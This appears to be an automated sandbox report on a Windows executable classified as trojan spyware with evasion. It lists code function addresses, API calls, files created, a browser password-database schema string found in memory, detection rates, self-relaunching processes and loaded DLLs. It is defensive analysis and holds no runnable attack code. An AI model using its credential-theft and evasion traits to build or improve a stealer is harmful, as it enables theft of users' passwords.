Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E2A88	9_2_397E2A88
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EF280	9_2_397EF280
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DCD80	9_2_399DCD80
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D0698	9_2_399D0698
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DFA90	9_2_399DFA90
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D4A28	9_2_399D4A28
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D0040	9_2_399D0040
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D1478	9_2_399D1478
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DC660	9_2_399DC660
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D4598	9_2_399D4598
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D2598	9_2_399D2598
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D0590	9_2_399D0590
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D6588	9_2_399D6588
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D9780	9_2_399D9780
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DC1BF	9_2_399DC1BF
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D77B8	9_2_399D77B8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DF5B8	9_2_399DF5B8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DEBB1	9_2_399DEBB1
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DA9B0	9_2_399DA9B0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D25A8	9_2_399D25A8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DD7D8	9_2_399DD7D8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D57D8	9_2_399D57D8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D37DB	9_2_399D37DB
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DC1D0	9_2_399DC1D0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D89D0	9_2_399D89D0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D77C8	9_2_399D77C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DF5C8	9_2_399DF5C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DD7C8	9_2_399DD7C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DA9C0	9_2_399DA9C0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D89C0	9_2_399D89C0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D9BFF	9_2_399D9BFF
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DE1F8	9_2_399DE1F8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D37E8	9_2_399D37E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D2118	9_2_399D2118
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D4108	9_2_399D4108
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D2108	9_2_399D2108
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D7338	9_2_399D7338
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D5338	9_2_399D5338
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DDD31	9_2_399DDD31
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DA530	9_2_399DA530
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D8530	9_2_399D8530
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DBD30	9_2_399DBD30
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D7328	9_2_399D7328
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DA520	9_2_399DA520
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D3358	9_2_399D3358
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D3350	9_2_399D3350
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D5348	9_2_399D5348
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D8540	9_2_399D8540
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DBD40	9_2_399DBD40
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DDD40	9_2_399DDD40
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DD778	9_2_399DD778
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D6577	9_2_399D6577
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D9772	9_2_399D9772
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DCD6F	9_2_399DCD6F
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D6E97	9_2_399D6E97
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DA091	9_2_399DA091
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D1C88	9_2_399D1C88
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DFA81	9_2_399DFA81
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D4EB8	9_2_399D4EB8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DB8B0	9_2_399DB8B0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D6EA8	9_2_399D6EA8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DA0A0	9_2_399DA0A0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DB8A0	9_2_399DB8A0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DF0D8	9_2_399DF0D8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D80DA	9_2_399D80DA
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D2EC8	9_2_399D2EC8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DF0C8	9_2_399DF0C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D2EC3	9_2_399D2EC3
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D40FD	9_2_399D40FD
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D60F8	9_2_399D60F8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DE6F8	9_2_399DE6F8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D92F0	9_2_399D92F0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D80E8	9_2_399D80E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DE6E8	9_2_399DE6E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D60E7	9_2_399D60E7
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D92E1	9_2_399D92E1
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D6A18	9_2_399D6A18
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D4A18	9_2_399D4A18
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DB411	9_2_399DB411
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DEC10	9_2_399DEC10
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D9C10	9_2_399D9C10
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DE208	9_2_399DE208
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D6A08	9_2_399D6A08
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D003F	9_2_399D003F
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DAE3F	9_2_399DAE3F
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D2A38	9_2_399D2A38
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D2A28	9_2_399D2A28
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DB420	9_2_399DB420
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D7C58	9_2_399D7C58
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D5C57	9_2_399D5C57
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DAE50	9_2_399DAE50
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DC650	9_2_399DC650
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D8E4F	9_2_399D8E4F
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D7C47	9_2_399D7C47
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D3C78	9_2_399D3C78
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D1C77	9_2_399D1C77
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DD270	9_2_399DD270
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D5C68	9_2_399D5C68
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D1468	9_2_399D1468
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D3C68	9_2_399D3C68
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399D8E60	9_2_399D8E60
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_399DD260	9_2_399DD260
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A53598	9_2_39A53598
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A50BD8	9_2_39A50BD8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A55F28	9_2_39A55F28
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5D908	9_2_39A5D908
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A56248	9_2_39A56248
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A59DA8	9_2_39A59DA8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A56BA8	9_2_39A56BA8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5CFA8	9_2_39A5CFA8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A54380	9_2_39A54380
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A58188	9_2_39A58188
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5B388	9_2_39A5B388
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A571E8	9_2_39A571E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5A3E8	9_2_39A5A3E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5D5E8	9_2_39A5D5E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5BFF8	9_2_39A5BFF8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A553C0	9_2_39A553C0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A587C8	9_2_39A587C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5B9C8	9_2_39A5B9C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A50BC8	9_2_39A50BC8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5C328	9_2_39A5C328
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A59128	9_2_39A59128
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5A708	9_2_39A5A708
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A57508	9_2_39A57508
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5C968	9_2_39A5C968
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A59768	9_2_39A59768
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A56568	9_2_39A56568
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A55B40	9_2_39A55B40
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A57B48	9_2_39A57B48
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5AD48	9_2_39A5AD48
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A54D58	9_2_39A54D58
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A53CA0	9_2_39A53CA0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A550A0	9_2_39A550A0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5B6A8	9_2_39A5B6A8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A584A8	9_2_39A584A8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A56888	9_2_39A56888
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A59A88	9_2_39A59A88
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5CC88	9_2_39A5CC88
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A538E0	9_2_39A538E0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A556E0	9_2_39A556E0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A58AE8	9_2_39A58AE8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5BCE8	9_2_39A5BCE8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A546C8	9_2_39A546C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A56EC8	9_2_39A56EC8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5A0C8	9_2_39A5A0C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5D2C8	9_2_39A5D2C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5AA28	9_2_39A5AA28
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A57828	9_2_39A57828
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A54A38	9_2_39A54A38
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5C008	9_2_39A5C008
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A58E08	9_2_39A58E08
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A50015	9_2_39A50015
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A50610	9_2_39A50610
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A54060	9_2_39A54060
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5B068	9_2_39A5B068
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A57E68	9_2_39A57E68
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A55E78	9_2_39A55E78
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A50040	9_2_39A50040
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A50648	9_2_39A50648
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A59448	9_2_39A59448
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A5C648	9_2_39A5C648
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A63D78	9_2_39A63D78
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A65C30	9_2_39A65C30
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A67120	9_2_39A67120
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A65548	9_2_39A65548
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A66A38	9_2_39A66A38
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A66350	9_2_39A66350
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A65C20	9_2_39A65C20
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A67111	9_2_39A67111
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A632D1	9_2_39A632D1
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A65538	9_2_39A65538
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A66A28	9_2_39A66A28
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_39A66340	9_2_39A66340

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Code function: String function: 00402C37 appears 51 times

Source: pkNnK2ya0f.exe

Static PE information: invalid certificate

Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs pkNnK2ya0f.exe
Source: pkNnK2ya0f.exe, 00000009.00000002.2360016384.00000000364B7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs pkNnK2ya0f.exe

Source: pkNnK2ya0f.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/21@5/5

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403373
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		9_2_00403373

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Code function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046E6

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Code function: 0_2_004020FE CoCreateInstance,

0_2_004020FE

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

File created: C:\Users\user\AppData\Local\antinuke

Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

File created: C:\Users\user\AppData\Local\Temp\nsy60E2.tmp

Jump to behavior

Source: pkNnK2ya0f.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036A57000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036A15000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036A24000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036A4A000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036A33000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: pkNnK2ya0f.exe	Virustotal: Detection: 61%
Source: pkNnK2ya0f.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

File read: C:\Users\user\Desktop\pkNnK2ya0f.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pkNnK2ya0f.exe "C:\Users\user\Desktop\pkNnK2ya0f.exe"
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process created: C:\Users\user\Desktop\pkNnK2ya0f.exe "C:\Users\user\Desktop\pkNnK2ya0f.exe"
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Process created: C:\Users\user\Desktop\pkNnK2ya0f.exe "C:\Users\user\Desktop\pkNnK2ya0f.exe"	Jump to behavior

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Section loaded: ncryptsslp.dll	Jump to behavior
